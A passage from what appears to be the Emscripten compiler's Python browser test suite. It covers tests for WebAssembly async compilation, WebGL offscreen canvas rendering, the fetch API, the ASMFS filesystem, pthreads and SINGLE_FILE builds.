{{{ SCRIPT }}}
'''
shell_with_script('shell.html', 'shell.html', script)
common_args = ['--shell-file', 'shell.html']
for opts, returncode in [
([], 1),
(['-O1'], 1),
(['-O2'], 1),
(['-O3'], 1),
(['-s', 'WASM_ASYNC_COMPILATION'], 1), # force it on
(['-O1', '-s', 'WASM_ASYNC_COMPILATION=0'], 0), # force it off
]:
print(opts, returncode)
self.btest_exit('binaryen_async.c', assert_returncode=returncode, args=common_args + opts)
# Ensure that compilation still works and is async without instantiateStreaming available
no_streaming = ' <script> WebAssembly.instantiateStreaming = undefined;</script>'
shell_with_script('shell.html', 'shell.html', no_streaming + script)
self.btest_exit('binaryen_async.c', assert_returncode=1, args=common_args)
# Test that implementing Module.instantiateWasm() callback works.
@parameterized({
'': ([],),
'asan': (['-fsanitize=address', '-s', 'INITIAL_MEMORY=128MB'],)
})
def test_manual_wasm_instantiate(self, args=[]):
self.compile_btest([test_file('manual_wasm_instantiate.cpp'), '-o', 'manual_wasm_instantiate.js'] + args)
shutil.copyfile(test_file('manual_wasm_instantiate.html'), 'manual_wasm_instantiate.html')
self.run_browser('manual_wasm_instantiate.html', 'wasm instantiation succeeded', '/report_result?1')
def test_wasm_locate_file(self):
# Test that it is possible to define "Module.locateFile(foo)" function to locate where worker.js will be loaded from.
ensure_dir('cdn')
create_file('shell2.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "test.wasm") return "cdn/test.wasm"; else return filename; }, '))
self.compile_btest([test_file('browser_test_hello_world.c'), '--shell-file', 'shell2.html', '-o', 'test.html'])
shutil.move('test.wasm', os.path.join('cdn', 'test.wasm'))
self.run_browser('test.html', '', '/report_result?0')
def test_utf8_textdecoder(self):
self.btest_exit('benchmark_utf8.cpp', 0, args=['--embed-file', test_file('utf8_corpus.txt') + '@/utf8_corpus.txt', '-s', 'EXPORTED_RUNTIME_METHODS=[UTF8ToString]'])
def test_utf16_textdecoder(self):
self.btest_exit('benchmark_utf16.cpp', 0, args=['--embed-file', test_file('utf16_corpus.txt') + '@/utf16_corpus.txt', '-s', 'EXPORTED_RUNTIME_METHODS=[UTF16ToString,stringToUTF16,lengthBytesUTF16]'])
def test_TextDecoder(self):
self.btest('browser_test_hello_world.c', '0', args=['-s', 'TEXTDECODER=0'])
just_fallback = os.path.getsize('test.js')
self.btest('browser_test_hello_world.c', '0')
td_with_fallback = os.path.getsize('test.js')
self.btest('browser_test_hello_world.c', '0', args=['-s', 'TEXTDECODER=2'])
td_without_fallback = os.path.getsize('test.js')
self.assertLess(td_without_fallback, just_fallback)
self.assertLess(just_fallback, td_with_fallback)
def test_small_js_flags(self):
self.btest('browser_test_hello_world.c', '0', args=['-O3', '--closure=1', '-s', 'INCOMING_MODULE_JS_API=[]', '-s', 'ENVIRONMENT=web'])
# Check an absolute js code size, with some slack.
size = os.path.getsize('test.js')
print('size:', size)
# Note that this size includes test harness additions (for reporting the result, etc.).
self.assertLess(abs(size - 5453), 100)
# Tests that it is possible to initialize and render WebGL content in a pthread by using OffscreenCanvas.
# -DTEST_CHAINED_WEBGL_CONTEXT_PASSING: Tests that it is possible to transfer WebGL canvas in a chain from main thread -> thread 1 -> thread 2 and then init and render WebGL content there.
@no_chrome('see https://crbug.com/961765')
@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_in_pthread(self):
for args in [[], ['-DTEST_CHAINED_WEBGL_CONTEXT_PASSING']]:
self.btest('gl_in_pthread.cpp', expected='1', args=args + ['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'OFFSCREENCANVAS_SUPPORT', '-lGL'])
# Tests that it is possible to render WebGL content on a <canvas> on the main thread, after it has once been used to render WebGL content in a pthread first
# -DTEST_MAIN_THREAD_EXPLICIT_COMMIT: Test the same (WebGL on main thread after pthread), but by using explicit .commit() to swap on the main thread instead of implicit "swap when rAF ends" logic
@requires_threads
@requires_offscreen_canvas
@disabled('This test is disabled because current OffscreenCanvas does not allow transfering it after a rendering context has been created for it.')
def test_webgl_offscreen_canvas_in_mainthread_after_pthread(self):
for args in [[], ['-DTEST_MAIN_THREAD_EXPLICIT_COMMIT']]:
self.btest('gl_in_mainthread_after_pthread.cpp', expected='0', args=args + ['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'OFFSCREENCANVAS_SUPPORT', '-lGL'])
@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_only_in_pthread(self):
self.btest('gl_only_in_pthread.cpp', expected='0', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-s', 'OFFSCREENCANVAS_SUPPORT', '-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER'])
# Tests that rendering from client side memory without default-enabling extensions works.
@requires_graphics_hardware
def test_webgl_from_client_side_memory_without_default_enabled_extensions(self):
self.btest('webgl_draw_triangle.c', '0', args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DEXPLICIT_SWAP=1', '-DDRAW_FROM_CLIENT_MEMORY=1', '-s', 'FULL_ES2=1'])
# Tests for WEBGL_multi_draw extension
# For testing WebGL draft extensions like this, if using chrome as the browser,
# We might want to append the --enable-webgl-draft-extensions to the EMTEST_BROWSER env arg.
@requires_graphics_hardware
def test_webgl_multi_draw(self):
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ARRAYS=1', '-DEXPLICIT_SWAP=1'])
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ARRAYS_INSTANCED=1', '-DEXPLICIT_SWAP=1'])
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ELEMENTS=1', '-DEXPLICIT_SWAP=1'])
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ELEMENTS_INSTANCED=1', '-DEXPLICIT_SWAP=1'])
# Tests for base_vertex/base_instance extension
# For testing WebGL draft extensions like this, if using chrome as the browser,
# We might want to append the --enable-webgl-draft-extensions to the EMTEST_BROWSER env arg.
# If testing on Mac, you also need --use-cmd-decoder=passthrough to get this extension.
# Also there is a known bug with Mac Intel baseInstance which can fail producing the expected image result.
@requires_graphics_hardware
def test_webgl_draw_base_vertex_base_instance(self):
for multiDraw in [0, 1]:
for drawElements in [0, 1]:
self.btest('webgl_draw_base_vertex_base_instance_test.c', reference='webgl_draw_instanced_base_vertex_base_instance.png',
args=['-lGL',
'-s', 'MAX_WEBGL_VERSION=2',
'-s', 'OFFSCREEN_FRAMEBUFFER',
'-DMULTI_DRAW=' + str(multiDraw),
'-DDRAW_ELEMENTS=' + str(drawElements),
'-DEXPLICIT_SWAP=1',
'-DWEBGL_CONTEXT_VERSION=2'])
@requires_graphics_hardware
def test_webgl_sample_query(self):
cmd = ['-s', 'MAX_WEBGL_VERSION=2', '-lGL']
self.btest('webgl_sample_query.cpp', expected='0', args=cmd)
@requires_graphics_hardware
def test_webgl_timer_query(self):
for args in [
# EXT query entrypoints on WebGL 1.0
['-s', 'MAX_WEBGL_VERSION'],
# builtin query entrypoints on WebGL 2.0
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2'],
# EXT query entrypoints on a WebGL 1.0 context while built for WebGL 2.0
['-s', 'MAX_WEBGL_VERSION=2'],
]:
cmd = args + ['-lGL']
self.btest('webgl_timer_query.cpp', expected='0', args=cmd)
# Tests that -s OFFSCREEN_FRAMEBUFFER=1 rendering works.
@requires_graphics_hardware
def test_webgl_offscreen_framebuffer(self):
# Tests all the different possible versions of libgl
for threads in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
for version in [[], ['-s', 'FULL_ES3'], ['-s', 'FULL_ES3']]:
args = ['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DEXPLICIT_SWAP=1'] + threads + version
print('with args: %s' % str(args))
self.btest('webgl_draw_triangle.c', '0', args=args)
# Tests that VAOs can be used even if WebGL enableExtensionsByDefault is set to 0.
@requires_graphics_hardware
def test_webgl_vao_without_automatic_extensions(self):
self.btest('test_webgl_no_auto_init_extensions.c', '0', args=['-lGL', '-s', 'GL_SUPPORT_AUTOMATIC_ENABLE_EXTENSIONS=0'])
# Tests that offscreen framebuffer state restoration works
@requires_graphics_hardware
def test_webgl_offscreen_framebuffer_state_restoration(self):
for args in [
# full state restoration path on WebGL 1.0
['-s', 'MAX_WEBGL_VERSION', '-s', 'OFFSCREEN_FRAMEBUFFER_FORBID_VAO_PATH'],
# VAO path on WebGL 1.0
['-s', 'MAX_WEBGL_VERSION'],
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=0'],
# VAO path on WebGL 2.0
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=1', '-DTEST_REQUIRE_VAO=1'],
# full state restoration path on WebGL 2.0
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=1', '-s', 'OFFSCREEN_FRAMEBUFFER_FORBID_VAO_PATH'],
# blitFramebuffer path on WebGL 2.0 (falls back to VAO on Firefox < 67)
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=0'],
]:
cmd = args + ['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DEXPLICIT_SWAP=1']
self.btest('webgl_offscreen_framebuffer_swap_with_bad_state.c', '0', args=cmd)
# Tests that -s WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG=1 rendering works.
@requires_graphics_hardware
def test_webgl_workaround_webgl_uniform_upload_bug(self):
self.btest('webgl_draw_triangle_with_uniform_color.c', '0', args=['-lGL', '-s', 'WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG'])
# Tests that using an array of structs in GL uniforms works.
@requires_graphics_hardware
def test_webgl_array_of_structs_uniform(self):
self.btest('webgl_array_of_structs_uniform.c', args=['-lGL', '-s', 'MAX_WEBGL_VERSION=2'], reference='webgl_array_of_structs_uniform.png')
# Tests that if a WebGL context is created in a pthread on a canvas that has not been transferred to that pthread, WebGL calls are then proxied to the main thread
# -DTEST_OFFSCREEN_CANVAS=1: Tests that if a WebGL context is created on a pthread that has the canvas transferred to it via using Emscripten's EMSCRIPTEN_PTHREAD_TRANSFERRED_CANVASES="#canvas", then OffscreenCanvas is used
# -DTEST_OFFSCREEN_CANVAS=2: Tests that if a WebGL context is created on a pthread that has the canvas transferred to it via automatic transferring of Module.canvas when EMSCRIPTEN_PTHREAD_TRANSFERRED_CANVASES is not defined, then OffscreenCanvas is also used
@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_in_proxied_pthread(self):
for asyncify in [0, 1]:
cmd = ['-s', 'USE_PTHREADS', '-s', 'OFFSCREENCANVAS_SUPPORT', '-lGL', '-s', 'GL_DEBUG', '-s', 'PROXY_TO_PTHREAD']
if asyncify:
# given the synchronous render loop here, asyncify is needed to see intermediate frames and
# the gradual color change
cmd += ['-s', 'ASYNCIFY', '-DASYNCIFY']
print(str(cmd))
self.btest('gl_in_proxy_pthread.cpp', expected='1', args=cmd)
@requires_threads
@requires_graphics_hardware
@requires_offscreen_canvas
def test_webgl_resize_offscreencanvas_from_main_thread(self):
for args1 in [[], ['-s', 'PROXY_TO_PTHREAD']]:
for args2 in [[], ['-DTEST_SYNC_BLOCKING_LOOP=1']]:
for args3 in [[], ['-s', 'OFFSCREENCANVAS_SUPPORT', '-s', 'OFFSCREEN_FRAMEBUFFER']]:
cmd = args1 + args2 + args3 + ['-s', 'USE_PTHREADS', '-lGL', '-s', 'GL_DEBUG']
print(str(cmd))
self.btest('resize_offscreencanvas_from_main_thread.cpp', expected='1', args=cmd)
@requires_graphics_hardware
def test_webgl_simple_enable_extensions(self):
for webgl_version in [1, 2]:
for simple_enable_extensions in [0, 1]:
cmd = ['-DWEBGL_CONTEXT_VERSION=' + str(webgl_version),
'-DWEBGL_SIMPLE_ENABLE_EXTENSION=' + str(simple_enable_extensions),
'-s', 'MAX_WEBGL_VERSION=2',
'-s', 'GL_SUPPORT_AUTOMATIC_ENABLE_EXTENSIONS=' + str(simple_enable_extensions),
'-s', 'GL_SUPPORT_SIMPLE_ENABLE_EXTENSIONS=' + str(simple_enable_extensions)]
self.btest('webgl2_simple_enable_extensions.c', expected='0', args=cmd)
# Tests the feature that shell html page can preallocate the typed array and place it
# to Module.buffer before loading the script page.
# In this build mode, the -s INITIAL_MEMORY=xxx option will be ignored.
# Preallocating the buffer in this was is asm.js only (wasm needs a Memory).
def test_preallocated_heap(self):
self.btest_exit('test_preallocated_heap.cpp', args=['-s', 'WASM=0', '-s', 'INITIAL_MEMORY=16MB', '-s', 'ABORTING_MALLOC=0', '--shell-file', test_file('test_preallocated_heap_shell.html')])
# Tests emscripten_fetch() usage to XHR data directly to memory without persisting results to IndexedDB.
def test_fetch_to_memory(self):
# Test error reporting in the negative case when the file URL doesn't exist. (http 404)
self.btest('fetch/to_memory.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '-DFILE_DOES_NOT_EXIST'],
also_asmjs=True)
# Test the positive case when the file URL exists. (http 200)
shutil.copyfile(test_file('gears.png'), 'gears.png')
for arg in [[], ['-s', 'FETCH_SUPPORT_INDEXEDDB=0']]:
self.btest('fetch/to_memory.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH'] + arg,
also_asmjs=True)
@parameterized({
'': ([],),
'pthread_exit': (['-DDO_PTHREAD_EXIT'],),
})
@requires_threads
def test_fetch_from_thread(self, args):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest('fetch/from_thread.cpp',
expected='42',
args=args + ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'FETCH_DEBUG', '-s', 'FETCH', '-DFILE_DOES_NOT_EXIST'],
also_asmjs=True)
def test_fetch_to_indexdb(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest('fetch/to_indexeddb.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH'],
also_asmjs=True)
# Tests emscripten_fetch() usage to persist an XHR into IndexedDB and subsequently load up from there.
def test_fetch_cached_xhr(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest('fetch/cached_xhr.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH'],
also_asmjs=True)
# Tests that response headers get set on emscripten_fetch_t values.
@requires_threads
def test_fetch_response_headers(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest('fetch/response_headers.cpp', expected='1', args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'], also_asmjs=True)
# Test emscripten_fetch() usage to stream a XHR in to memory without storing the full file in memory
def test_fetch_stream_file(self):
self.skipTest('moz-chunked-arraybuffer was firefox-only and has been removed')
# Strategy: create a large 128MB file, and compile with a small 16MB Emscripten heap, so that the tested file
# won't fully fit in the heap. This verifies that streaming works properly.
s = '12345678'
for i in range(14):
s = s[::-1] + s # length of str will be 2^17=128KB
with open('largefile.txt', 'w') as f:
for i in range(1024):
f.write(s)
self.btest('fetch/stream_file.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '-s', 'INITIAL_MEMORY=536870912'],
also_asmjs=True)
# Tests emscripten_fetch() usage in synchronous mode when used from the main
# thread proxied to a Worker with -s PROXY_TO_PTHREAD=1 option.
@requires_threads
def test_fetch_sync_xhr(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/sync_xhr.cpp', args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
# Tests emscripten_fetch() usage when user passes none of the main 3 flags (append/replace/no_download).
# In that case, in append is implicitly understood.
@requires_threads
def test_fetch_implicit_append(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest('fetch/example_synchronous_fetch.cpp', expected='200', args=['-s', 'FETCH', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
# Tests synchronous emscripten_fetch() usage from wasm pthread in fastcomp.
@requires_threads
def test_fetch_sync_xhr_in_wasm(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest('fetch/example_synchronous_fetch.cpp', expected='200', args=['-s', 'FETCH', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
# Tests that the Fetch API works for synchronous XHRs when used with --proxy-to-worker.
@requires_threads
def test_fetch_sync_xhr_in_proxy_to_worker(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest('fetch/sync_xhr.cpp',
expected='0',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '--proxy-to-worker'],
also_asmjs=True)
# Tests waiting on EMSCRIPTEN_FETCH_WAITABLE request from a worker thread
@no_wasm_backend("emscripten_fetch_wait uses an asm.js based web worker")
@requires_threads
def test_fetch_sync_fetch_in_main_thread(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest('fetch/sync_fetch_in_main_thread.cpp', expected='0', args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
@requires_threads
@no_wasm_backend("WASM2JS does not yet support pthreads")
def test_fetch_idb_store(self):
self.btest('fetch/idb_store.cpp', expected='0', args=['-s', 'USE_PTHREADS', '-s', 'FETCH', '-s', 'WASM=0', '-s', 'PROXY_TO_PTHREAD'])
@requires_threads
@no_wasm_backend("WASM2JS does not yet support pthreads")
def test_fetch_idb_delete(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest('fetch/idb_delete.cpp', expected='0', args=['-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG', '-s', 'FETCH', '-s', 'WASM=0', '-s', 'PROXY_TO_PTHREAD'])
@requires_asmfs
@requires_threads
def test_asmfs_hello_file(self):
# Test basic file loading and the valid character set for files.
ensure_dir('dirrey')
shutil.copyfile(test_file('asmfs', 'hello_file.txt'), os.path.join(self.get_dir(), 'dirrey', 'hello file !#$%&\'()+,-.;=@[]^_`{}~ %%.txt'))
self.btest_exit('asmfs/hello_file.cpp', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG', '-s', 'PROXY_TO_PTHREAD'])
@requires_asmfs
@requires_threads
def test_asmfs_read_file_twice(self):
shutil.copyfile(test_file('asmfs', 'hello_file.txt'), 'hello_file.txt')
self.btest_exit('asmfs/read_file_twice.cpp', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG', '-s', 'PROXY_TO_PTHREAD'])
@requires_asmfs
@requires_threads
def test_asmfs_fopen_write(self):
self.btest_exit('asmfs/fopen_write.cpp', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_mkdir_create_unlink_rmdir(self):
self.btest('cstdio/test_remove.cpp', expected='0', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_dirent_test_readdir(self):
self.btest('dirent/test_readdir.c', expected='0', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_dirent_test_readdir_empty(self):
self.btest('dirent/test_readdir_empty.c', expected='0', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_unistd_close(self):
self.btest_exit(test_file('unistd', 'close.c'), 0, args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_unistd_access(self):
self.btest_exit(test_file('unistd', 'access.c'), 0, args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_unistd_unlink(self):
# TODO: Once symlinks are supported, remove -DNO_SYMLINK=1
self.btest_exit(test_file('unistd', 'unlink.c'), 0, args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG', '-DNO_SYMLINK=1'])
@requires_asmfs
@requires_threads
def test_asmfs_test_fcntl_open(self):
self.btest('fcntl/test_fcntl_open.c', expected='0', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG', '-s', 'PROXY_TO_PTHREAD'])
@requires_asmfs
@requires_threads
def test_asmfs_relative_paths(self):
self.btest_exit('asmfs/relative_paths.cpp', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_threads
def test_pthread_locale(self):
for args in [
[],
['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2'],
]:
print("Testing with: ", args)
self.btest('pthread/test_pthread_locale.c', expected='1', args=args)
# Tests the Emscripten HTML5 API emscripten_set_canvas_element_size() and emscripten_get_canvas_element_size() functionality in singlethreaded programs.
def test_emscripten_set_canvas_element_size(self):
self.btest('emscripten_set_canvas_element_size.c', expected='1')
# Test that emscripten_get_device_pixel_ratio() is callable from pthreads (and proxies to main thread to obtain the proper window.devicePixelRatio value).
@requires_threads
def test_emscripten_get_device_pixel_ratio(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
self.btest('emscripten_get_device_pixel_ratio.c', expected='1', args=args)
# Tests that emscripten_run_script() variants of functions work in pthreads.
@requires_threads
def test_pthread_run_script(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
self.btest(test_file('pthread', 'test_pthread_run_script.cpp'), expected='1', args=['-O3'] + args)
# Tests emscripten_set_canvas_element_size() and OffscreenCanvas functionality in different build configurations.
@requires_threads
@requires_graphics_hardware
def test_emscripten_animate_canvas_element_size(self):
for args in [
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DTEST_EXPLICIT_CONTEXT_SWAP=1'],
['-DTEST_EXPLICIT_CONTEXT_SWAP=1', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1'],
['-DTEST_EXPLICIT_CONTEXT_SWAP=1', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DTEST_MANUALLY_SET_ELEMENT_CSS_SIZE=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'OFFSCREENCANVAS_SUPPORT'],
]:
cmd = ['-lGL', '-O3', '-g2', '--shell-file', test_file('canvas_animate_resize_shell.html'), '-s', 'GL_DEBUG', '--threadprofiler'] + args
print(' '.join(cmd))
self.btest('canvas_animate_resize.cpp', expected='1', args=cmd)
# Tests the absolute minimum pthread-enabled application.
@requires_threads
def test_pthread_hello_thread(self):
for opts in [[], ['-O3']]:
for modularize in [[], ['-s', 'MODULARIZE', '-s', 'EXPORT_NAME=MyModule', '--shell-file', test_file('shell_that_launches_modularize.html')]]:
self.btest(test_file('pthread', 'hello_thread.c'), expected='1', args=['-s', 'USE_PTHREADS'] + modularize + opts)
# Tests that a pthreads build of -s MINIMAL_RUNTIME=1 works well in different build modes
def test_minimal_runtime_hello_pthread(self):
for opts in [[], ['-O3']]:
for modularize in [[], ['-s', 'MODULARIZE', '-s', 'EXPORT_NAME=MyModule']]:
self.btest(test_file('pthread', 'hello_thread.c'), expected='1', args=['-s', 'MINIMAL_RUNTIME', '-s', 'USE_PTHREADS'] + modularize + opts)
# Tests memory growth in pthreads mode, but still on the main thread.
@requires_threads
def test_pthread_growth_mainthread(self):
self.emcc_args.remove('-Werror')
def run(emcc_args=[]):
self.btest(test_file('pthread', 'test_pthread_memory_growth_mainthread.c'), expected='1', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'INITIAL_MEMORY=32MB', '-s', 'MAXIMUM_MEMORY=256MB'] + emcc_args, also_asmjs=False)
run()
run(['-s', 'PROXY_TO_PTHREAD'])
# Tests memory growth in a pthread.
@requires_threads
def test_pthread_growth(self):
self.emcc_args.remove('-Werror')
def run(emcc_args=[]):
self.btest(test_file('pthread', 'test_pthread_memory_growth.c'), expected='1', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'INITIAL_MEMORY=32MB', '-s', 'MAXIMUM_MEMORY=256MB', '-g'] + emcc_args, also_asmjs=False)
run()
run(['-s', 'ASSERTIONS'])
run(['-s', 'PROXY_TO_PTHREAD'])
# Tests that time in a pthread is relative to the main thread, so measurements
# on different threads are still monotonic, as if checking a single central
# clock.
@requires_threads
def test_pthread_reltime(self):
self.btest(test_file('pthread', 'test_pthread_reltime.cpp'), expected='3', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Tests that it is possible to load the main .js file of the application manually via a Blob URL, and still use pthreads.
@requires_threads
def test_load_js_from_blob_with_pthreads(self):
# TODO: enable this with wasm, currently pthreads/atomics have limitations
self.compile_btest([test_file('pthread', 'hello_thread.c'), '-s', 'USE_PTHREADS', '-o', 'hello_thread_with_blob_url.js'])
shutil.copyfile(test_file('pthread', 'main_js_as_blob_loader.html'), 'hello_thread_with_blob_url.html')
self.run_browser('hello_thread_with_blob_url.html', 'hello from thread!', '/report_result?1')
# Tests that base64 utils work in browser with no native atob function
def test_base64_atob_fallback(self):
create_file('test.c', r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
return 0;
}
''')
# generate a dummy file
create_file('dummy_file', 'dummy')
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest(['test.c', '-s', 'EXIT_RUNTIME', '-s', 'MODULARIZE', '-s', 'EXPORT_NAME="Foo"', '--preload-file', 'dummy_file', '-s', 'SINGLE_FILE'])
create_file('a.html', '''
<script>
atob = undefined;
fetch = undefined;
</script>
<script src="a.out.js"></script>
<script>
var foo = Foo();
</script>
''')
self.run_browser('a.html', '...', '/report_result?exit:0')
# Tests that SINGLE_FILE works as intended in generated HTML (with and without Worker)
def test_single_file_html(self):
self.btest('single_file_static_initializer.cpp', '19', args=['-s', 'SINGLE_FILE'], also_proxied=True)
self.assertExists('test.html')
self.assertNotExists('test.js')
self.assertNotExists('test.worker.js')
self.assertNotExists('test.wasm')
self.assertNotExists('test.mem')
# Tests that SINGLE_FILE works as intended in generated HTML with MINIMAL_RUNTIME
def test_minimal_runtime_single_file_html(self):
for wasm in [0, 1]:
for opts in [[], ['-O3']]:
self.btest('single_file_static_initializer.cpp', '19', args=opts + ['-s', 'MINIMAL_RUNTIME', '-s', 'SINGLE_FILE', '-s', 'WASM=' + str(wasm)])
self.assertExists('test.html')
self.assertNotExists('test.js')
self.assertNotExists('test.wasm')
self.assertNotExists('test.asm.js')
self.assertNotExists('test.mem')
self.assertNotExists('test.js')
self.assertNotExists('test.worker.js')
# Tests that SINGLE_FILE works when built with ENVIRONMENT=web and Closure enabled (#7933)
def test_single_file_in_web_environment_with_closure(self):
self.btest('minimal_hello.c', '0', args=['-s', 'SINGLE_FILE', '-s', 'ENVIRONMENT=web', '-O2', '--closure=1'])
# Tests that SINGLE_FILE works as intended with locateFile
def test_single_file_locate_file(self):
for wasm_enabled in [True, False]:
args = [test_file('browser_test_hello_world.c'), '-o', 'test.js', '-s', 'SINGLE_FILE']
if not wasm_enabled:
args += ['-s', 'WASM=0']
self.compile_btest(args)
create_file('test.html', '''
<script>
var Module = {
locateFile: function (path) {
if (path.indexOf('data:') === 0) {
throw new Error('Unexpected data URI.');
}
return path;
}
};
</script>
<script src="test.js"></script>
''')
self.run_browser('test.html', None, '/report_result?0')
# Tests that SINGLE_FILE works as intended in a Worker in JS output
def test_single_file_worker_js(self):
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.js', '--proxy-to-worker', '-s', 'SINGLE_FILE'])
create_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
self.assertExists('test.js')
self.assertNotExists('test.worker.js')
# Tests that pthreads code works as intended in a Worker. That is, a pthreads-using
# program can run either on the main thread (normal tests) or when we start it in
# a Worker in this test (in that case, both the main application thread and the worker threads
# are all inside Web Workers).
@requires_threads
def test_pthreads_started_in_worker(self):
